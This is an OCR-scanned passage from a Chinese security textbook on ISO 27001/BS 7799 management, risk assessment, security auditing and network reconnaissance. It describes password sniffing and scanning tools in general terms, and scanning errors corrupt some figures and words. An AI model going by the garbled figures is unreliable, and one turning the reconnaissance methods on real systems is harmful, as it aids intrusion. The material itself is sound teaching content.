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1995 年 5 月 ， 英 国标 准 协会 (BST) 就 提出 了 信息 安全 管理 标准 BS 7799， 并 于 1999 年 

重新 修改 了 该 标准 ,该 标准 分 为 两 个 部 分 :BS 7799-1,《 信 息 安全 管理 实施 规则 》; BS 7799-2， 
《信息 安全 管理 体系 规范 》。 

第 一 部 分 ，BS 7799-1， 英 文 名 为 Code of Practice for Information Security Management， 
于 2000 年 12 月 , 经 包括 中 国 在 内 的 ISO/TECJTC1( 国 际 标准 化 组 织 和 国际 电工 委员 会 的 联 
合 技术 委员 会 ) 投 票 认可 ， 成 为 国际 上 最 具 权 威 的 和 最 具 代 表 性 的 标准 ， 即 国际 标准 
ISO/TEC 17799，《 信 息 技术 -信息 安全 管理 实施 细则 》。 目 前 其 最 新 版 本 为 2005 版 ， 也 就 
是 常 说 的 ISO/TEC 17799:2005。 

第 二 部 分 , BS 7799-2, 名 为 Information Security Management Systems. Specification with 
guidance for use， 其 最 新 修订 版 在 2005 年 10 月 经 ISO/TEC 采纳 ， 正 式 成 为 ISO 27001。 


1. BS 7799 第 一 部 分 (ISO/IEC 17799:2005) 


际 标准 ISO 17799， 是 一 个 详细 的 安全 标准 ， 包 括 安 全 内 容 的 所 有 准则 ， 由 10 个 独 
立 的 部 分 组 成 ， 每 一 节 都 覆盖 了 不 同 的 主题 和 区 域 。 可 以 引导 机 构 、 企 业 建立 一 个 完整 的 
信息 安全 管理 体系 ， 它 以 分 析 组 织 机 构 及 企业 面临 的 安全 风险 为 起 点 ， 对 信息 安全 风险 进 
行动 态 的 、 全 面 的 、 有 效 的 、 不 断 改进 的 管理 ， 强 调 信息 安全 管理 的 目的 是 保护 组 织 机 构 
及 企业 业务 的 连续 性 不 受信 息 安全 事件 的 破坏 , 从 机 构 或 企业 现 有 的 资源 和 管理 基础 出 发 ， 
建立 信息 安全 管理 体系 (ISMS)， 使 机 构 或 企业 的 信息 安全 以 最 小 投入 满足 需求 。 

通过 层次 结构 化 形式 提供 安全 策略 、 信 息 安 全 的 组 织 结构 、 资 产 管理 、 人 力 资源 安全 
等 11 个 安全 控制 章节 ， 以 规范 组 织 机 构 信 息 安 全 管理 建设 的 内 容 这 11 个 章节 如 下 。 
安全 方针 : 为 信息 安全 提供 管理 指导 和 支持 。 


. 

。 ”安全 组 织 :在 公司 内 管理 信息 安全 。 

。 ”资产 分 类 与 管理 ， 对 公司 的 信息 资产 采取 适当 的 保护 措施 。 

e ”人员 安 全 : 减少 人 为 误 用 、 偷 穷 、 欺 诈 或 滥用 信息 以 及 处 理 设施 的 风险 。 

e ”实体 和 环境 安全 防止 对 商业 场所 及 信息 未 经 授权 的 访问 、 损 坏 及 干扰 。 

。 ”通讯 与 运作 管理 : 确保 信息 处 理 设 施 正 确 和 安全 运行 。 

。 ”访问 控制 : 管理 对 信息 的 访问 。 

。 ”系统 的 获得 、 开 发 和 维护 ， 确 保 将 安全 纳入 信息 系统 的 整个 生命 周期 。 

。 ”安全 事件 管理 : 确保 安全 事件 发 生 后 有 正确 的 处 理 流程 和 报告 方式 。 

。 ”商业 活动 连续 性 管理 ， 防 止 商业 活动 的 中 断 ， 并 保护 关键 的 业务 过 程 免 受 重大 故 
障 或 灾难 的 影响 。 

。 ”符合 法 律 : 避免 违反 任何 法 律 法 规 ， 不 履行 合同 义务 以 及 不 符合 任何 安全 要 求 的 
行为 。 


2. BS 7799 第 二 部 分 (ISO 27001) 


ISO 27001 是 目前 最 完整 的 建立 信息 安全 管理 体系 ISMS(Specification for Information 
Security Management Systems) 的 参考 规范 ， 详 细 说 明了 建立 、 实 施 和 维护 信息 安全 管理 体 
系 的 要 求 ,可 用 来 指导 相关 人 员 去 应 用 ISO 17799, 它 以 “计划 (Plan)、 实 施 (Do)、 检 查 (Check)、 
行动 (Action)” 模 式 ， 将 管理 体系 规范 导入 机 构 或 企业 内 ， 以 达到 “持续 改进 ”的 目的 。 其 
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最 终 目 标 ， 在 于 建立 适合 企业 需要 的 信息 安全 管理 体系 。 


10.7.2 ”如 何 实施 ISMS 
1. ISMS 建立 过 程 


(1) 研究 采购 标准 ， 读 懂 ， 读 通 。 

(2) 培训 ， 帮 助 实 施 信息 安全 管理 系统 。 

(3) 组 建 队 伍 制 订 策 略 ， 通 过 最 高 管理 层 组 织 策划 全 面 实施 体系 。 

(4) 选择 顾问 ， 可 以 得 到 顾问 建议 ， 从 而 更 好 地 实施 信息 安全 管理 体系 。 

(5) 进行 风险 评估 ， 需 要 对 所 有 潜在 安全 缺陷 进行 评估 。 这 不 仅 限于 I， 而 且 还 包括 
组 织 所 有 敏感 信息 。 

(6) 制定 策略 文件 ， 作 为 管理 信息 安全 体系 权威 性 文件 。 

(7) 制定 支持 性 文件 ， 汇 集 相关 程序 来 支持 你 的 安全 策略 。 包 括 资 产 、 人 员 安 全 、 物 
理 环 境 安全 、 业 务 持续 经 营 管理 等 。 

(8) 选择 认证 机 构 , 认证 机 构 是 第 三 方 , 可 以 前 往 公 司 并 有 效 地 审核 公司 的 管理 体系 
如 果 符 合 标 准 ， 认 证 机 构 将 颁发 证 书 。 

(9) 实施 信息 安全 管理 体系 ， 实 施 的 关键 是 沟通 和 培训 。 在 实施 阶段 ， 所 有 执行 程序 
的 人 都 要 收集 记录 以 证 明 : 规定 的 做 到 了 ， 做 到 的 符合 规定 了 。 

(10) 获得 认证 ， 认 证 机 构 安 排 初审 。 在 此 阶段 认证 机 构 将 审核 你 的 信息 安全 管理 体系 
并 建议 是 否 发 证 。 

(11) 后 续 审 核 ， 一 旦 你 获得 认证 并 拿 到 证 书 ， 你 就 可 以 对 外 宣传 你 的 企业 已 成 功 获得 
认证 。 为 保证 认证 资格 你 需要 继续 实施 信息 管理 体系 。 认 证 机 构 定 期 对 标准 执行 情况 进行 
检查 。 

2.， 认证 步骤 

(1) 按照 ISO 27001(BS 7799-2:2005) 建 立 框架 。 

(2) 评估 费用 和 确定 正式 审核 时 间 。 

(3) 向 评估 机 构 递交 正式 申请 。 

(4) 评估 机 构 将 进行 预审 ， 在 正式 审核 前 排除 一 些 重大 的 缺失 ， 同 时 让 客户 熟悉 审核 
的 方法 及 风险 评估 、 审 查 方针 、 范 围 和 采用 的 程序 。 检 查 体系 中 遗漏 和 需要 修改 的 地 方 。 
这 一 步 为 可 选项 。 

(5) 评估 机 构 将 进行 第 一 阶段 审核 ， 主 要 进行 方针 ， 范 围 和 采用 程序 的 审核 ， 查 看 风 
险 评估 的 结果 、 处 理 方法 和 适用 性 声明 ， 检 查 体系 中 遗漏 和 需要 修改 的 地 方 。 

(6) 评估 机 构 将 进行 第 二 阶段 审核 ， 主 要 进行 实施 审核 ， 查 看 程序 规定 的 执行 情况 。 
评估 机 构 将 现场 审核 并 给 出 建议 。 

(7) 如 果 能 顺利 完成 审核 ， 在 确定 清楚 认证 范围 后 ， 发 放 信息 安全 体系 证 书 。 在 满足 
持续 审核 情况 下 ，3 年 有 效 。 
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3. 认证 机 构 BSI 


英 标 管理 体系 认证 有 限 公司 , 是 全 球 最 早 和 最 具 权 威 的 国际 认证 机 构 , 拥有 超过 60000 
个 认证 地 点 和 100 多 个 国家 的 客户 ， 提 供 包 括 审 核 、 认 证 和 培训 在 内 的 各 种 针对 管理 体系 
的 专业 性 服务 ， 有 企业 经 营 连 续 性 、 环 境 、 食 品 安全 、 健 康 和 安全 、 信 息 安全 、 整 合 管理 、 
质量 、 社 会 责任 、 持 续 发 展 、IT 服务 管理 等 。 其 客户 包括 波音 、 惠 普 、 中 国 国际 航空 、 通 
用 汽车 、 花 旗 集团 等 。 

4. 认证 情况 

全 球 已 经 颁发 了 超过 1000 张 认证 证 书 , 证 书 主要 集中 在 日 本 、 英 国 、 印 度 等 国家 和 我 
国 的 台湾 地 区 。 证 书 的 分 布 主 要 在 政府 、 人 金融、 通信 、 电 子 、 物 流 等 行业 。2002 年 4 月 ， 
我 国 第 一 个 制造 企业 “ 生 益 科技 ”(600183) 通 过 了 挪威 船 级 社 DNV 的 审核 认证 ， 获 得 了 
BS 7799 英国 认证 证 书 ， 成 为 我 国 首 家 、 全 球 百 家 之 内 的 获得 BS 7799 证 书 的 制造 企业 。 
其 他 通过 认证 的 国内 企业 还 有 几 十 家 。 如 中 芯 国际 、 上 海 华 虹 NEC 电子 有 限 公 司 、 大 连 简 
柏 特 (GENPACT) 信 息 技术 有 限 公 司 、 大 连 华 信 计算 机 技术 有 限 公 司 、GDS 万 国 数据 、 博 朗 
软件 、 上 海 超级 计算 中 心 、 辽 宁 移 动 CMNET 骨干 网 等 。 


10.7.3 国内 信息 安全 管理 标准 


我 国政 府 主管 部 门 以 及 各 行 各 业已 经 认识 到 了 信息 安全 的 重要 性 。 政 府 部 门 开 始 出 台 
-系列 相关 策略 ， 直 接 牵 引 、 推 进 信息 安全 的 应 用 和 发 展 。 由 政府 主导 的 各 大 信息 系统 工 
程 和 信息 化 程度 要 求 非常 高 的 相关 行业 ， 也 开始 出 台 对 信息 安全 技术 产品 的 应 用 标准 和 规 
范 。 国 务 院 信息 化 工作 小 组 最 近 颁 布 的 《关于 我 国电 子 政务 建设 指导 意见 》 也 强调 指出 了 
电子 政务 建设 中 信息 系统 安全 的 重要 性 。 中 国人 民 银 行 正在 加 紧 制定 网 上 银行 系统 安全 性 
评估 指引 ， 并 明确 提出 对 信息 安全 的 投资 要 达到 IT 总 投资 的 10% 以 上 , 而 在 其 他 一 些 关 键 
行业 ， 信 息 安全 的 投资 甚至 已 经 超过 了 总 IT 预算 的 30% 一 509%。 

2002 年 4 月 ， 我 国 成 立 了 “全 国信 息 安全 标准 化 技术 委员 会 (TC260)”( 简 称 信息 安全 
标 委 会 ), 该 标 委 会 是 在 信息 安全 的 专业 领域 内 , 从 事 信息 安全 标准 化 工作 的 技术 工作 组 织 。 
信息 安全 标 委 会 设置 了 10 个 工作 组 ， 其 中 信息 安全 管理 ( 含 工程 与 开发 ) 工 作 组 (WG7) 负 责 
对 信息 安全 的 行政 、 技 术 、 人 员 等 管理 提出 规范 要 求 及 指导 指南 ， 它 包括 信息 安全 管理 指 
南 、 信 息 安全 管理 实施 规范 、 人 员 培 训 教育 及 录用 要 求 、 信 息 安全 社会 化 服务 管理 规范 、 
信息 安全 保险 业务 规范 框架 和 安全 策略 要 求 与 指南 。 目 前 ，WG7 工作 组 正在 着 手 制定 推荐 
性 国家 标准 《信息 技术 信息 安全 管理 实用 规则 》， 该 标准 的 采用 程度 为 等 同 采用 标准 ， 也 
就 是 说 该 标准 与 ISO/IEC 17799 相同 ， 除 了 纠正 排版 或 印刷 错误 、 改 变 标点 符号 、 增 加 不 
改变 技术 内 容 的 说 明和 指示 之 外 不 改变 标准 技术 的 内 容 。 

虽然 我 国信 息 安全 标 委 会 不 是 将 ISO/TEC 17799 和 ISO/TEC 27001 作为 强制 性 国家 标准 
引入 ， 而 是 仅 作为 推荐 性 国家 标准 推行 ， 但 是 企业 和 组 织 仍然 可 以 将 ISO/TEC 17799 和 
ISO/TEC 27001 作为 衡量 信息 安全 管理 体系 规范 程度 的 一 个 标准 和 指标 。 建 立信 息 安全 管理 
体系 并 获得 认证 机 构 的 认证 ， 不 仅 能 提高 组 织 自 身 的 安全 管理 水 平 ， 将 企业 的 安全 风险 控 
制 在 可 接受 的 程度 ， 保 证 业务 的 可 持续 运作 ， 减 小 信息 安全 遭 到 破坏 带 来 的 损失 ， 并 旦 能 


加 


(> 网络 雪人 管理 与 维护 


向 利益 相关 方 展示 组 织 对 信息 安全 的 承诺 ， 向 政府 及 行业 主管 部 门 证 明 组 织 符合 相关 法 律 
法 规 ， 并 且 得 到 国际 上 的 承认 。 尤 其 对 于 银行 、 证 券 、 电 子 商务 、ISP 等 服务 提供 商 来 说 ， 
可 以 借 此 向 客户 展示 其 服务 相 比 其 他 竞争 对 手 更 加 安全 、 可 靠 ， 并 树立 和 增强 企业 的 信息 
安全 形象 ， 提 高 企业 的 综合 竞争 力 。 
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第 11 章 ”安全 审核 与 风险 分 析 


本 章 要 点 

安全 审核 的 概念 
安全 审核 的 过 程 
审核 和 日 志 分 析 
审核 结果 实践 响应 


11.1 安全 审核 入 门 


11.1.1 审核 人 员 的 职责 

1. 从 安全 管理 者 的 角度 考虑 

安全 管理 者 需要 从 防火 墙 内 部 进行 监测 , 关注 内 部 网 络 服务 器 和 主机 是 否 有 异常 情况 。 
另外 ， 还 要 从 防火 墙 外 部 进行 渗透 以 查看 防火 墙 的 规则 配置 是 否 有 漏洞 ， 判 断 黑客 是 否 能 
穿 透 防火 墙 进而 控制 网 络 主机 。 

2. 从 安全 顾问 的 角度 考虑 

1) “从 黑客 的 角度 和 不 知情 的 审核 者 的 角度 对 网 络 进行 测试 

当 黑 客 想 要 入 侵 时 , 想 知道 其 所 在 的 内 部 网 络 区 段 是 否 存在 可 以 入 侵 或 攻击 的 对 象 时 ， 
他 首先 会 对 所 有 主机 进行 扫描 侦查 ， 以 查看 哪些 系统 是 正在 运行 的 ， 有 没有 未 进行 修复 的 
弱点 和 漏洞 。 审 核 人 员 在 防火 墙 内 外 对 网 络 进行 扫描 侦查 、 渗 透 测 试 。 进 行 此 类 操作 的 审 
核 人 员 称 为 ethical hacker 或 white hat hacker。 使 用 IBM ethical hacking division 和 Axem Tiger 
Team 提供 的 审核 工具 。 事 实证 明 ， 利 用 各 种 扫描 工具 与 技术 侦 测 目 标 系 统 ， 可 以 找 出 所 有 
正在 运行 的 系统 ， 并 可 以 侦 测 出 潜在 的 易 受 攻击 的 目标 。 

2) ”从 一 个 内 部 知情 人 的 角度 来 评估 网 络 安全 

实施 现场 分 析 ， 了 解 网 络 的 拓扑 结构 、 服 务 等 所 有 网 络 资源 的 具体 配置 情况 。 内 容 包 
括 网 络 运作 的 各 项 标准 、 可 预测 的 合法 网 络 行为 、 某 些 特定 服务 及 功能 的 网 络 正常 流量 、 
各 种 数据 报 文 的 特征 。 


11.1.2 ”风险 评估 


风险 评估 是 指定 位 网 络 资源 和 明确 攻击 发 生 的 可 能 性 。 它 是 一 种 “差距 分 析 ”， 可 以 
显示 出 安全 策略 和 实际 发 生 攻击 之 间 的 差距 。 

信息 安全 风险 评估 是 指 依据 有 关 信 息 安全 技术 与 管理 标准 ， 对 信息 系统 及 由 其 处 理 、 
传输 和 存储 的 信息 的 机 密 性 、 完 整 性 和 可 用 性 等 安全 属性 进行 评价 的 过 程 。 
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1. 风险 评估 的 准备 
风险 评估 的 准备 过 程 是 组 织 机 构 进行 风险 评估 的 基础 ， 是 整个 风险 评估 过 程 有 效 性 的 


保证 ， 主 要 包括 以 下 几 个 方面 。 


(D 确定 风险 评估 的 目标 。 

(2) 确定 风险 评估 的 范围 。 

(3) 建立 适当 的 组 织 结构 。 

(4) 建立 系统 性 的 风险 评估 方法 。 

(5) 获得 最 高 管理 者 对 风险 评估 计划 的 批准 。 
2. 风险 评估 的 依据 


(1) 政策 法 规 ， 中 办 发 [2003]27 号 文件 和 国信 办 文件 。 
(2) 国际 标准 :如 BS 7799-1，《 信 息 安全 管理 实施 细则 》 和 BS 7799-2，《 信 息 安全 


管理 体系 规范 》 等 。 


(3) 国家 标准 或 正在 审批 的 讨论 稿 : 如 GB 17859 一 1999 《计算 机 信息 系统 安全 保护 


等 级 划分 准则 》 和 《信息 安全 风险 评估 指南 》 等 。 


(4) 行业 通用 标准 等 其 他 标准 。 

3. 风险 评估 的 原则 

风险 评估 包括 可 控 性 、 完 整 性 、 最 小 影响 和 保密 4 个 原则 。 

1) ”可 控 性 原则 

(1) 人 员 管 理 可 控 性 。 

(2) 工具 使 用 可 控 性 。 

(3) 项 目 实施 过 程 可 控 性 。 

2) ”完整 性 原则 

完整 性 原则 是 严格 按照 评估 要 求 和 指定 的 范围 进行 全 面 的 评估 服务 。 
3) ”最 小 影响 原则 

最 小 影响 原则 是 从 项 目 管理 层面 和 工具 技术 层面 ， 力 求 将 风险 评估 对 信息 系统 的 正常 


运行 的 可 能 影响 降 到 最 低 程度 。 


人 ”保密 原则 
保密 原则 是 对 委托 单位 的 敏感 信息 进行 妥善 保管 ， 防 止 敏感 信息 的 泄露 。 


4. 风险 评估 的 步骤 


(D 仔细 检查 书面 安全 策略 。 

(2) 对 资源 进行 分 析 、 分 类 和 排序 一 一 找 出 网 络 中 最 重要 的 资源 。 

(3) 找 出 容易 遭受 攻击 的 资源 ， 如 表 11-1 所 示 。 

(4) 考虑 商业 需求 。 

(5) 评估 已 有 的 边界 和 内 部 安全 。 

@ 边界 安全 指 网 络 间 区 分 彼此 的 能 力 ， 防 火 墙 是 定义 安全 边界 的 第 一 道 屏障 。 
@ ”内 部 安全 是 指 网 络 管理 员 监 测 和 打击 未 授权 的 网 络 活动 的 能 力 。 
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表 11-1 易 受 攻击 的 资源 


攻击 热点 潜在 威胁 


路 由 器 和 交换 机 
防火 墙 
网 络 主机 
安全 帐号 数据 库 
信息 数据 库 
SMTP 服务 器 
HTTP 服务 器 
FTP 服务 器 

(6) 使 用 已 有 的 管理 和 控制 结构 。 

5. 风险 结果 的 判定 

1) ”风险 等 级 的 划分 

明确 不 同 威胁 对 资产 所 产生 的 风险 ， 确 定 风 险 数 值 的 大 小 ， 确 定 不 同 风险 的 优先 次 序 
或 等 级 ， 风 险 级 别 高 的 资产 应 被 优先 分 配 资源 进行 保护 。 风 险 等 级 从 1 一 5 划分 为 五 级 。 等 
级 越 大 ， 风 险 越 高 。 

2) ”控制 措施 的 选择 

对 不 可 接受 的 风险 选择 适当 的 处 理 方式 及 控制 措施 ， 并 形成 风险 处 理 计 划 。 控 制 措施 
的 选择 应 兼顾 管理 与 技术 。 

3) “残余 风险 的 评价 

对 于 不 可 接受 范围 内 的 风险 ， 应 在 选择 了 适当 的 控制 措施 后 ， 对 残余 风险 进行 评价 ， 
判定 风险 是 否 已 经 降低 到 可 接受 的 水 平 ， 为 风险 管理 提供 输入 。 为 确保 所 选择 控制 措施 的 
有 效 性 ， 必 要 时 可 进行 再 评估 ， 以 判断 实施 控制 措施 后 的 残余 风险 是 否 是 可 接受 的 。 


11.1.3 ”安全 审核 注意 事项 

1. 安全 审核 的 要 素 

安全 审核 涉及 4 个 基本 要 素 。 

1) “控制 目标 

控制 目标 是 指 企业 根据 具体 的 计算 机 应 用 , 结合 企业 实际 情况 制定 出 的 安全 控制 要 求 。 

2) “安全 漏洞 

安全 漏洞 是 指 系统 的 安全 薄弱 环节 ， 容 易 被 干扰 或 破坏 的 地 方 。 

3) ”控制 措施 

控制 措施 是 指 企业 为 实现 其 安全 控制 目标 所 制定 的 安全 控制 技术 、 配 置 方法 及 各 种 规 
范 制度 。 

4 控制 测试 

控制 测试 是 将 企业 的 各 种 安全 控制 措施 与 预定 的 安全 标准 进行 一 致 性 比较 ， 确 定 各 项 


网 络 资源 


服务 器 资源 


图 
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控制 措施 是 否 存 在 、 是 否 得 到 执行 、 对 漏洞 的 防范 是 否 有 效 ， 以 及 评价 企业 安全 措施 的 可 
依赖 程度 。 

2. 安全 标准 

1) ISO 7498-2 
国际 标准 组 织 (ISO) 建 立 了 7498 系列 标准 来 帮助 网 络 实施 标准 化 ， 其 中 第 二 个 文件 
7498-2 描述 了 如 何 确保 站 点 安全 和 实施 有 效 的 审核 计划 。 

2) ”英国 标准 7799(BS 7799) 

BS 7799 论述 了 如 何 确 保 网 络 系 统 安全 , 其 中 BS 7799-1 讨论 了 确保 网 络 安全 所 采取 的 
步骤 ，BS 7799-2 讨论 了 在 实施 信息 安全 管理 系统 ISMS) 时 应 采取 的 步骤 。 

3) Common Criteria(CC) 

Common Criteria 提供 了 网 络 安全 解决 方案 的 全 球 统一 标准 。ISO 为 了 统一 区 域 和 国家 
间 的 安全 标准 指定 了 Common Criteria。 


3. 获得 最 高 管理 者 支持 

任何 一 个 组 织 ， 推 行 任何 一 套 安全 管理 体系 ， 首 先 都 必须 获得 最 高 管理 者 的 支持 。 在 
安全 审核 初期 ， 最 高 管理 者 的 支持 可 以 表现 在 以 下 方面 。 

(1) 在 财务 方面 提供 必要 的 投资 。 

(2) 配备 必要 充足 的 人 力 资 源 ， 分 配 一 定 的 工作 时 间 于 工作 的 推动 上 。 

4. 获取 客户 信息 的 反馈 

来 自 客户 的 反馈 信息 是 衡量 业绩 的 重要 指标 之 一 ， 可 以 被 用 来 评价 网 络 安全 管理 体系 
的 总 体 有 效 性 。 对 一 个 机 构 进行 一 次 安全 审核 后 要 及 时 地 与 被 审核 机 构 进 行 及 时 的 沟通 ， 
以 了 解 安全 审核 的 效果 。 获 得 客户 反馈 的 信息 ， 了 解 到 工作 中 存在 哪些 不 足 ， 针 对 不 同 企 
业 或 机 构 采 取 不 同 的 审核 方式 。 


11.2 审核 过 程 


11.2.1 检查 安全 策略 


安全 策略 的 主要 目标 就 是 为 获取 、 管 理 和 审查 计算 机 资源 提供 一 个 准绳 。 一 个 强大 的 
安全 策略 是 合理 且 成 功 地 应 用 安全 工具 的 先决 条 件 。 如 果 没 有 明确 的 规则 和 目标 ， 则 安装 、 
应 用 和 运行 安全 工具 是 不 可 能 有 效 的 。 
安全 策略 应 该 简洁 明了 ， 一 个 好 的 安全 策略 应 具有 以 下 特征 。 
。 ”安全 策略 不 能 与 法 律 法 规 相 冲 突 。 
。 ”为 了 正确 地 使 用 信息 系统 ， 安 全 策略 应 当 对 责任 进行 合理 的 分 配 ， 为 机 构 中 的 所 
有 重要 人 员 都 确定 一 个 身份 。 如 系统 管理 员 、IT 技术 人 员 等 。 

e ”良好 的 可 执行 性 。 

。 ”有 与 之 匹配 的 预防 策略 被 破坏 安全 工具 。 即 使 不 能 预防 破坏 ， 也 应 能 检测 出 并 制 
裁 违规 者 。 
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。 ”能 提供 突 发 性 处 理 ， 若 一 旦 检测 到 侵入 者 就 能 进行 处 理 。 
通过 对 各 种 策略 文档 进行 阅读 和 分 析 ， 能 够 获得 整个 策略 文档 体系 的 概貌 ， 并 评价 策 
略 文档 体系 能 否 满足 安全 工作 的 要 求 。 检 查 安全 策略 的 过 程 如 下 。 
。 ”查看 是 否 有 “风险 分 析 ” 项 目 。 
查看 IT 任务 陈述 。 
查看 是 否 有 如 何 实施 安全 策略 以 及 如 何 处 理 说 明 。 
查看 是 否 有 坏 行为 或 不 正当 行为 的 说 明 。 
查看 是 否 有 全 面 的 “备份 和 恢复 ”或 “业务 连续 性 ”计划 。 


11.2.2 ”划分 资产 等 级 


正确 对 资产 进行 分 类 ， 划 分 不 同 的 等 级 ， 正 确 识 别 出 审 核 的 对 象 是 进行 安全 审核 非常 
关键 的 前 提 条 件 。 

1. 资产 确认 

(1) 硬件 资产 ,包括 路 由 器 、 交 换 机 、 硬 件 防火 墙 、 入 侵 检测 设备 、 服 务 器 、 磁 盘 驱 
动 器 、 电 话 线 、 调 制 解 调 器 等 。 

(2) 软件 资产 : 包括 操作 系统 、 应 用 程序 、 安 全 软件 和 诊断 程序 等 。 

(3) 对 私有 或 保密 数据 进行 分 类 (从 顾客 数据 库 到 专用 应 用 程序 )。 

(4) 对 常规 数据 ， 包 括 数 据 库 、 文 档 、 备 份 、 系 统 日 志和 掉 线 数据 等 进行 分 类 。 

(5) 对 机 构 里 的 人 员 要 进行 确认 和 分 类 ， 对 机 构 外 但 与 机 构 有 往来 的 也 要 进行 确认 和 
分 类 。 

2. 资产 评估 

(1) 对 于 大 多 数 的 资产 可 以 用 货币 数量 多 少 的 方法 对 其 进行 资产 确定 。 

(2) 进行 资产 评估 要 考虑 4 种 价值 : 所 有 者 的 平均 期 望 损失 、 所 有 者 的 最 大 期 望 损失 、 
攻击 者 的 平均 获 利 、 攻 击 者 的 最 大 获 利 。 

(3) 资产 确认 和 评估 是 一 个 复杂 的 过 程 。 在 大 型 公司 中 ， 成 立 一 个 工作 委员 会 ， 需 从 
各 个 部 门 (也 包括 IT 部 门 ) 召 集 人 员 来 参加 。 

3. 判断 危险 性 


给 出 需要 保护 的 资产 后 ， 就 需要 判断 这 些 资 产 面临 的 危险 性 。 计 算 机 危险 的 部 分 分 类 
如 下 。 

(1) 软 硬 件 故障 : 包括 软件 缺陷 或 失效 、 硬 件 失效 。 

(2) 物理 环境 威胁 : 包括 火灾 、 洪 水 、 雷 击 、 龙 卷 风 、 地 震 、 爆 炸 、 建 筑 倒塌 、 垃 圾 、 
灰尘 、 烟 雾 、 强 电磁 辐射 。 

(3) 人 员 : 包括 无 恶意 内 部 人 员 、 恶 意 内 部 人 员 、 外 部 人 员 攻 击 。 

(4) 外 部 因素 : 包括 信息 被 盗 取 或 泄露 ， 硬 件 、 软 件 、 磁 盘 和 磁带 等 被 盗 ， 窍 听 ， 社 
会 工程 ， 黑 客 等 。 
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4. 划分 资产 等 级 


在 对 一 个 系统 的 资产 进行 了 确认 、 评 估 和 人 危险 判断 后 ， 应 根据 国家 相关 的 评估 标准 对 
各 个 资产 进行 等 级 划分 ， 划 分 的 标准 如 表 11-2 所 示 。 


表 11-2 资产 等 级 划分 


描 述 
非常 重要 ， 其 安全 属性 破坏 后 可 能 对 组 织造 成 非常 严重 的 损失 
重要 ， 其 安全 属性 破坏 后 可 能 对 组 织造 成 比较 严重 的 损失 
比较 重要 ， 其 安全 属性 破坏 后 可 能 对 组 织造 成 中 等 程度 的 损失 
不 太 重 要 ， 其 安全 属性 破坏 后 可 能 对 组 织造 成 较 低 的 损失 
不 重要 ， 其 安全 属性 破坏 后 对 组 织造 成 很 小 的 损失 ， 甚 至 忽略 不 计 


资产 的 等 级 表明 了 资产 对 系统 的 重要 性 程度 ， 安 全 审核 人 员 应 根据 各 个 资产 的 等 级 确 
定 相 应 的 安全 审核 策略 。 


11.2.3 ”系统 资源 侦查 

1. 侦查 方法 

黑客 攻击 系统 之 前 ， 必 须要 知道 攻击 目标 的 一 些 相 关 信息 ， 这 就 需要 事先 侦查 。 通 过 
侦查 可 以 获得 大 量 的 目标 系统 的 基本 信息 。 有 两 种 侦查 方式 : 被 动 侦查 和 主动 侦查 。 

Il) 被动 侦查 

攻击 者 攻击 系统 时 必须 对 该 系统 有 一 个 初步 的 了 解 ， 以 确定 如 何 去 攻击 。 被 动 信息 的 
收集 并 不 是 常常 有 用 的 ， 但 却 很 必要 ， 因 为 这 些 信息 是 其 他 步骤 的 先决 条 件 。 被 动 侦查 收 
集 的 信息 可 以 是 公司 的 域名 、 公 司 的 服务 器 和 系统 等 。 在 某 些 情况 下 ， 被 动 侦查 会 给 攻击 
者 提供 访问 前 所 需 的 所 有 信息 ， 如 果 使 用 得 当 的 话 ， 攻 击 者 会 通过 这 些 信息 获得 更 多 其 他 
有 用 的 信息 。 

被 动 侦 查 有 两 类 : 嗅 探 (Sniffing) 和 信息 收集 (Information gathering)。 

比较 典型 的 例子 是 嗅 探 口令 。 攻 击 者 可 以 从 工作 站 上 运行 程序 ， 该 工作 站 是 用 来 寻找 
NT 身份 鉴定 包 的 。 当 工作 站 找到 一 个 NT 鉴定 包 ， 就 从 包 中 找 出 加 密 口令 并 保存 它 。 攻 击 
者 通过 口令 解密 得 到 简单 的 文本 口令 。 

信息 收集 指 攻击 者 收集 对 主动 攻击 有 帮助 的 信息 。 例 如 ， 攻 击 者 在 某 个 公司 的 网 络 出 
口 观察 数据 传送 ， 如 果 发 现 一 些 Sun 公司 的 数据 包 ， 就 能 判定 有 人 在 运行 Solaris(Sun 公司 
的 一 种 网 络 操作 系统 ); 如 果 发 现在 微软 发 布 Windows 2000 时 收 到 信息 包 ， 就 能 判定 该 公 
司 服务 器 的 操作 系统 为 Windows 2000。 

2) ”主动 侦查 

主动 侦查 是 指 攻击 者 已 经 有 了 足够 的 信息 再 去 探查 或 扫描 站 点 。 

主动 侦查 的 相关 信息 包括 : 可 以 访问 的 主机 、 路 由 器 和 防火 墙 的 位 置 、 关 键 部 件 上 运 
行 的 操作 系统 、 开 放 的 端口 、 运 行 的 服务 和 运行 的 应 用 程序 的 版 本 号 。 

在 主动 侦查 阶段 ， 攻 击 者 得 到 的 信息 越 多 ， 攻 击 系统 时 就 越 容易 。 通 常 攻击 者 会 尽力 
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找到 一 些 初始 信息 ， 然 后 再 去 入 侵 系 统 。 如 果 不 能 入 侵 系 统 ， 攻 击 者 就 接着 返回 收集 信息 。 
实际 上 这 是 一 个 反复 的 过 程 ， 攻 击 者 收集 一 点 ,测试 一 点 ， 如 此 反复 直到 能 进行 入 侵 为 止 。 

当 攻 击 者 进行 主动 侦查 时 ， 侦 察 机 会 就 会 相应 提高 。 对 于 安全 管理 员 来 说 ， 拥 有 一 些 
日 志 并 且 及 时 抓 住 黑客 的 侦察 是 最 关键 的 ， 否 则 以 后 侦察 到 攻击 者 的 机 会 就 会 大 大 减少 。 

大 多 数 情况 下 ， 攻 击 者 先 用 被 动 侦查 去 攻击 不 易 被 发 现 的 部 分 ， 然 后 再 用 主动 侦查 去 
攻击 并 收集 需要 的 信息 。 

2. 安全 扫描 

通过 安全 扫描 可 以 获得 网 络 的 相关 信息 。 主 要 使 用 下 列 方法 。 

DNS 工具 ， 如 whois、nslookup 和 host。 

标准 的 应 用 程序 ， 包 括 ping 、traceroute、Telnet 和 SNMP。 
ping、 端 口 扫描 仪 和 共享 扫描 仪 。 

网 络 应 用 程序 及 共享 侦查 程序 ， 包 括 NMAP 和 Red Button 。 

。 ”包含 了 上 述 各 方法 的 企业 级 的 漏洞 扫描 仪 。 

可 以 使 用 ping 和 端口 扫描 程序 侦察 网 络 ， 也 可 以 使 用 客户 端 /服务 器 程序 ， 如 Telnet 
和 SNMP 等 来 侦查 网 络 有 用 信息 的 泄露 ， 总 之 必须 利用 一 些 工具 来 了 解 网 络 。 有 些 工具 很 
简单 ， 便 于 安装 和 使 用 ， 有 些 工 具 功 能 要 更 全 面 些 ， 使 用 前 需 认真 配置 。 个 别 情况 下 ， 当 
